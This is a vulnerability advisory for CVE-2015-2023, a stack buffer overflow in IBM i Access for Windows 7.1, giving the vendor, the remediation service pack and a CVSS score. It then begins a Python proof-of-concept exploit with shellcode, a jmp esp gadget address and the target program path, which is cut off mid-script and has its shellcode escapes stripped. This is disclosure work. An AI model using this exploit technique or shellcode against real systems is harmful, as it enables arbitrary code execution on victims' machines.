[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI-CLIENT-ACCESS-BUFFER-OVERFLOW.txt Vendor: ============== www.ibm.com Product: ==================================================== IBM i Access for Windows Release 7.1 of IBM i Access for Windows is affected Vulnerability Type: ======================= Stack Buffer Overflow Arbitrary Code Exec CVE Reference: ============== CVE-2015-2023 Vulnerability Details: ===================== IBM i Access for Windows is vulnerable to a buffer overflow. A local attacker could overflow a buffer and execute arbitrary code on the Windows PC. client Access has ability to receive remote commands via "Cwbrxd.exe" service Ref: http://www-01.ibm.com/support/docview.wss?uid=nas8N1019253 "Incoming remote command was designed for running non-interactive commands and programs on a PC", therefore a remote attacker could execute arbitrary code on the system. Remediation/Fixes The issue can be fixed by obtaining and applying the Service Pack SI57907. The buffer overflow vulnerability can be remediated by applying Service Pack SI57907. The Service Pack is available at: http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html Workarounds and Mitigations None known CVSS Base Score: 4.4 CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/104044 for the current score CVSS Environmental Score*: Undefined CVSS Vector: (AV:L/AC:M/Au:N/C:P/I:P/A:P) Exploit code(s): ============================================================================== Three python POC scriptz follow that exploitz various component of IBM i Access. 1) Exploits "ftdwprt.exe", direct EIP overwrite import struct,os,subprocess pgm="C:\Program Files (x86)\IBM\Client Access\AFPViewr\ftdwprt.exe " #shellcode to pop calc.exe Windows 7 SP1 sc=("x31xF6x56x64x8Bx76x30x8Bx76x0Cx8Bx76x1Cx8B" "x6Ex08x8Bx36x8Bx5Dx3Cx8Bx5Cx1Dx78x01xEBx8B" "x4Bx18x8Bx7Bx20x01xEFx8Bx7Cx8FxFCx01xEFx31" "xC0x99x32x17x66xC1xCAx01xAEx75xF7x66x81xFA" "x10xF5xE0xE2x75xCFx8Bx53x24x01xEAx0FxB7x14" "x4Ax8Bx7Bx1Cx01xEFx03x2Cx97x68x2Ex65x78x65" "x68x63x61x6Cx63x54x87x04x24x50xFFxD5xCC") # use jmp or call esp in FTDBT.dll under AFPviewer for Client Access # we find ---> 0x638091df : jmp esp | {PAGE_EXECUTE_READ} [FTDBDT.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.05.04.00 (C:Program Files (x86)IBMClient AccessAFPViewrFTDBDT.dll) rp=struct.pack('